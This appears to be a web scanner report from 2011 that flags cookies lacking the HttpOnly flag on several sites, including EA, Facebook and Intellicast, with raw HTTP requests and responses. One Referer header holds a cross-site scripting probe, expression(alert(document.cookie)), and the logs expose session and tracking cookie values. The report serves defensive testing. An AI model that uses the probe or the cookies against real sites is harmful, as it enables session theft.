<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=27lnus2ntqriv5k00j2k40ng93; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ipad HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:44 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=27lnus2ntqriv5k00j2k40ng93; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 61969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=18e0qmhkmneofnmkng5qlhs1k4; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /iphone HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:42 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=18e0qmhkmneofnmkng5qlhs1k4; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 74885
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=3f7u6pkb5ng23ddteumgngbv25; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mobile HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:47 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=3f7u6pkb5ng23ddteumgngbv25; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 71803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=jbq0ai9k9l5t598m4of0l22c32; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /platform/online-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:33 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=jbq0ai9k9l5t598m4of0l22c32; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 68051
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=402g5cpkl5kqg8i27g71bepsl4; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /platform/pc-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:31 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=402g5cpkl5kqg8i27g71bepsl4; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84317
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=4l4p40mas0vbdpd6hs2fi6r4h4; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /platform/ps3-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:40 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=4l4p40mas0vbdpd6hs2fi6r4h4; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84808
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=50refd00geb05if67umc20au74; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /platform/xbox-360-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:34 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=50refd00geb05if67umc20au74; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84273
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=4vsvrj360p5moup45jahp1d1l2; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wii HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:41 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=4vsvrj360p5moup45jahp1d1l2; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 71158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=BqNeE; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 29867
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=zoSHS; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=zoSHS; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:15 GMT Content-Length: 11443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=DGAoC; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Pogo HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=DGAoC; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:26 GMT Content-Length: 29798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=8aDVi; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/?sk=events P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=8aDVi; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:48 GMT Content-Length: 0
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=77KNI; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /logout.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=77KNI; path=/; domain=.facebook.com Set-Cookie: roadblock=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:18:12 GMT Content-Length: 0
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=VcqBg; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/Packet-Storm-Security/116613458352817 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=VcqBg; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 27755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=WrbZx; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /peanutlabs HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=WrbZx; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:43 GMT Content-Length: 130584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=4KsQr; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitetour/connect.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/instantpersonalization/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=4KsQr; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:17:22 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /login.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; expires=Tue, 08-Jan-2013 05:27:42 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=tJ98F; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:27:42 GMT Content-Length: 16799
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00_Head1"><title> In ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Local/Weather.aspx?location=USMI0020 HTTP/1.1 Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00_Head1"><title> In ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Travel/CheapFlightsWidget.htm HTTP/1.1 Host: www.intellicast.com Proxy-Connection: keep-alive Referer: http://www.intellicast.com/Local/Weather.aspx?location=USMI0020&54ef9%22style%3d%22x%3aexpression(alert(document.cookie))%2223d5246f6f3=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=42rfba55zy50y245eamzjj2q; CityId=USMI0020; RecentLocations=Alma, Michigan@USMI0020:; Pop=0; vw=1; NSC_jdbtu_efgbvmu_iuuq_wt=44113c293660
Response
HTTP/1.1 200 OK Cache-Control: max-age=86400 Content-Type: text/html Content-Location: http://www.intellicast.com/Travel/CheapFlightsWidget.htm Expires: Wed, 01 Jan 1997 12:00:00 GMT Last-Modified: Mon, 15 Feb 2010 17:02:20 GMT Accept-Ranges: bytes ETag: "0f681a260aeca1:d07" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sun, 09 Jan 2011 01:46:02 GMT nnCoection: close Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt=44113c293660;expires=Sun, 09-Jan-11 02:12:11 GMT;path=/ Content-Length: 9446
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Intellicast ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
mt_imp=54267db83a49b89cd0644d669488302a; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:13:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a; path=/ Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The following cookie was issued by the application and does not have the HttpOnly flag set:
mt_imp=54267db83a49b89cd0644d669488302a; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:13:59 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a; path=/ Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The following cookie was issued by the application and does not have the HttpOnly flag set:
mt_imp=54267db83a49b89cd0644d669488302a; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:14:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a; path=/ Location: http://www.socialtrack.net/click.track?CID=121402&AFID=73472&ADID=297792&SUBID=CD1 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
